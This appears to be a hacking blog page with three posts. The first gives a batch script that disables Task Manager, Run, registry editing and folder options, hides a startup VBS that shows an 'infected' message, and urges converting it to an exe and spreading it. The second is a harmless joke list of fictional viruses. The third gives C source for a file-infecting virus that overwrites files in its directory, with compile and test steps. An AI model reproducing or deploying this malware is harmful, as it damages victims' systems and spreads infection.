Registry Virus

Most of the virus programmers disable some features of the registry like,
Disables the task manager…..Disables the Run…..etc.
Let’s take a look how do they done all these….
Here I’m making a bat file which will do all these…..it is easy to
Convert a bat file to exe using a bat to exe converter .
This bat file will disable Run, Registry editing, task manager, Folder options, hidden files/folders.
And it will produce a Error message whenever restarts the system….likeYour system infected
=======================================================================

ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >> %WINDIR%\DXM.reg
echo "CheckedValue"=dword:0 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >> %WINDIR%\DXM.reg
echo "CheckedValue"=dword:0 >> %WINDIR%\DXM.reg

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableRegistryTools"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %WINDIR%\DXM.reg
echo "dxmv"="dxm.vbs" >> %WINDIR%\DXM.reg

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoRun"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoRun"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoFolderOptions"=dword:1 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoFolderOptions"=dword:0 >> %WINDIR%\DXM.reg

echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion] >> %WINDIR%\DXM.reg
echo "RegisteredOwner"="Mr. AkhilDas” >> %WINDIR%\DXM.reg
echo "RegisteredOrganization"="«« AkhlD™ »»" >> %WINDIR%\DXM.reg

echo. >> %WINDIR%\dxm.vbs
echo dxm=msgbox("Your system infected by «« AkhlD™ »» virus ",16,"iam_kingston@iamcrazy.in") >> %windir%\dxm.vbs

attrib +h +s +r %WINDIR%\dxm.vbs

start /w regedit /s %WINDIR%\DXM.reg
del %WINDIR%\DXM.reg

==========================================================================
This script actually makes a dxm.reg file in the windows directory and also makes dxm.vbs file in there.
It disables all the above functions…and put the dxm.vbs in the start up.
Now convert it to an exe file……spread it all around You!.....Enjoy ! [;)]

For Educational Purpose Only !

Read more »

Posted in: Virus

Computer Virus List

New Computer Virus List
OPRAH WINFREY VIRUS: Your 200MB hard drive suddenly shrinks to 80MB, and then slowly expands back to 200MB.
AT&T VIRUS: Every three minutes it tells you what great service you are getting.
MCI VIRUS: Every three minutes it reminds you that you're paying too much for the AT&T virus.
PAUL REVERE VIRUS: This revolutionary virus does not horse around. It warns you of impending hard disk attack---once if by LAN, twice if by C:>.
POLITICALLY CORRECT VIRUS: Never calls itself a "virus", but instead refers to itself as an "electronic microorganism."
RIGHT TO LIFE VIRUS: Won't allow you to delete a file, regardless of how old it is. If you attempt to erase a file, it requires you to first see a counselor about possible alternatives.
ROSS PEROT VIRUS: Activates every component in your system, just before the whole darn thing quits.
MARIO CUOMO VIRUS: It would be a great virus, but it refuses to run.
TED TURNER VIRUS: Colorizes your monochrome monitor.
ARNOLD SCHWARZENEGGER VIRUS: Terminates and stays resident. It'll be back.
DAN QUAYLE VIRUS #2: Their is sumthing rong wit your komputer, ewe jsut cant figyour out watt!
GOVERNMENT ECONOMIST VIRUS: Nothing works, but all your diagnostic software says everything is fine.
NEW WORLD ORDER VIRUS: Probably harmless, but it makes a lot of people really mad just thinking about it.
FEDERAL BUREAUCRAT VIRUS: Divides your hard disk into hundreds of little units, each of which does practically nothing, but all of which claim to be the most important part of your computer.
GALLUP VIRUS: Sixty percent of the PCs infected will lose 38 percent of their data 14 percent of the time. (plus or minus a 3.5 percent margin of error.)
TERRY RANDALL VIRUS: Prints "Oh no you don't" whenever you choose "Abort" from the "Abort" "Retry" "Fail" message.
TEXAS VIRUS: Makes sure that it's bigger than any other file.
ADAM AND EVE VIRUS: Takes a couple of bytes out of your Apple.
CONGRESSIONAL VIRUS: The computer locks up, screen splits erratically with a message appearing on each half blaming the other side for the problem.
AIRLINE VIRUS: You're in Dallas, but your data is in Singapore.
FREUDIAN VIRUS: Your computer becomes obsessed with marrying its own motherboard.
PBS VIRUS: Your programs stop every few minutes to ask for money.
ELVIS VIRUS: Your computer gets fat, slow and lazy, then self destructs; only to resurface at shopping malls and service stations across rural America.
OLLIE NORTH VIRUS: Causes your printer to become a paper shredder.
NIKE VIRUS: Just does it.
SEARS VIRUS: Your data won't appear unless you buy new cables, power supply and a set of shocks.
JIMMY HOFFA VIRUS: Your programs can never be found again.
CONGRESSIONAL VIRUS #2: Runs every program on the hard drive simultaneously, but doesn't allow the user to accomplish anything.
KEVORKIAN VIRUS: Helps your computer shut down as an act of mercy.
IMELDA MARCOS VIRUS: Sings you a song (slightly off key) on boot up, then subtracts money from your Quicken account and spends it all on expensive shoes it purchases through Prodigy.
STAR TREK VIRUS: Invades your system in places where no virus has gone before.
HEALTH CARE VIRUS: Tests your system for a day, finds nothing wrong, and sends you a bill for $4,500.
GEORGE BUSH VIRUS: It starts by boldly stating, "Read my docs....No new files!" on the screen. It proceeds to fill up all the free space on your hard drive with new files, then blames it on the Congressional Virus.
CLEVELAND INDIANS VIRUS: Makes your 486/50 machine perform like a 286/AT.
LAPD VIRUS: It claims it feels threatened by the other files on your PC and erases them in "self defense".
CHICAGO CUBS VIRUS: Your PC makes frequent mistakes and comes in last in the reviews, but you still love it.
ORAL ROBERTS VIRUS: Claims that if you don't send it a million dollars, it's programmer will take it back. >

Read more »

Posted in: Virus

make virus in C

This program is an example of how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the source code of the virus program.


#include
#include
#include
#include
#include
#include

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(”*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(”Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(”DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(”TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD:

BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4.All the infected files will be ready to reinfect

Read more »

Posted in: Virus